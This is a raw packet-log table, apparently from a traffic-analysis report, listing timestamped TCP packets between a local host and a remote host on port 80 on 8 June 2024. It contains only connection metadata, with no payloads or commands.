Jun 8, 2024 20:22:05.527750015 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.528753042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.528788090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.528820992 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.528824091 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.528845072 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.528856039 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.528870106 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.528889894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.528909922 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.528927088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.528948069 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.528960943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.528985023 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.529014111 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.529129982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.529165030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.529192924 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.529217005 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.529227972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.529244900 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.529263973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.529278040 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.529299021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.529320002 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.529334068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.529350042 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.529367924 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.529387951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.529416084 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.529915094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.529966116 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.529973984 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.529999018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.530016899 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.530033112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.530050993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.530067921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.530086994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.530101061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.530109882 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.530136108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.530149937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.530169964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.530188084 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.530205011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.530216932 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.530256987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.530985117 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.531032085 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.531053066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.531064987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.531091928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.531100035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.531111002 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.531132936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.531147957 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.531167984 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.531183958 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.531203032 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.531218052 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.531238079 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.531255960 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.531291962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.532289028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.532349110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.532357931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.532392979 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.532407045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.532423019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.532444954 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.532458067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.532468081 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.532572985 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.532583952 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.532618046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.532639980 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.532650948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.532666922 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.532685041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.532700062 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.532735109 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.532831907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.532866955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.532890081 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.532900095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.532911062 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.532936096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.532949924 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.532969952 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.532988071 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.533004045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.533021927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.533037901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.533046961 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.533073902 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.533088923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.533123016 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.533773899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.533807993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.533833027 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.533842087 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.533852100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.533875942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.533890009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.533911943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.533931971 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.533946037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.533956051 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.533977985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.533997059 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.534013987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.534027100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.534061909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.534800053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.534833908 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.534858942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.534867048 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.534879923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.534900904 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.534919024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.534935951 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.534957886 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.534969091 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.534976006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.535001993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.535017967 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.535037041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.535052061 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.535087109 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.535582066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.535615921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.535641909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.535649061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.535662889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.535684109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.535702944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.535739899 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.535964012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.535998106 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.536024094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.536032915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.536041975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.536067009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.536083937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.536102057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.536123991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.536145926 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.536165953 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.536180973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.536201000 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.536216021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.536237001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.536271095 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.536744118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.536798000 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.634458065 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.634506941 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.634533882 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.634566069 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.634567976 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.634608030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.634618998 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.634661913 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.634664059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.634700060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.634716034 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.634742022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.634752035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.634788990 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.635050058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.635086060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.635107040 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.635119915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.635123968 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.635154963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.635163069 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.635205030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.635612965 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.635643005 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.635668993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.635682106 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.635778904 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.635809898 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.635829926 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.635843992 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.635859966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.635879993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.635895014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.635915041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.635930061 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.635951042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.635972023 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.635987043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.636003017 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.636035919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.636543036 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.636578083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.636599064 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.636612892 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.636622906 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.636660099 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.636667013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.636701107 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.636722088 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.636737108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.636753082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.636771917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.636787891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.636821985 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.637197971 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.637233973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.637254000 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.637269020 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.637280941 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.637305975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.637315989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.637341976 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.637357950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.637377977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.637393951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.637413025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.637428999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.637448072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.637461901 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.637496948 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.642647028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.642683029 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.642713070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.642718077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.642739058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.642755032 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.642762899 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.642796993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.642806053 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.642831087 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.642853975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.642862082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.642890930 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.642898083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.642919064 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.642932892 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.642959118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.642980099 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.644946098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.645025969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.645056009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.645061016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.645077944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.645097017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.645117044 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.645131111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.645154953 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.645165920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.645184994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.645201921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.645222902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.645239115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.645260096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.645292997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.645299911 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.645328999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.645350933 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.645364046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.645389080 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.645401001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.645423889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.645437956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.645463943 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.645473003 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.645487070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.645508051 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.645529985 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.645545006 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.645565987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.645596027 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.646033049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.646066904 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.646095991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.646101952 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.646117926 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.646136045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.646152973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.646171093 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.646190882 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.646204948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.646229982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.646234989 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.646254063 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.646271944 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.646297932 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.646307945 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.646322966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.646364927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.647114038 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.647150993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.647175074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.647186041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.647198915 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.647221088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.647234917 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.647258043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.647279978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.647296906 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.647315979 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.647330046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.647353888 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.647366047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.647382975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.647402048 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.647425890 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.647455931 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.656963110 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.656999111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.657023907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.657102108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.657135963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.657167912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.657191038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.657191038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.657202959 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.657226086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.657226086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.657233000 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.657257080 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.657274961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.657284021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.657310009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.657342911 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.657365084 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.657746077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.657780886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.657804012 CEST	49731	80	192.168.2.4	23.88.106.134
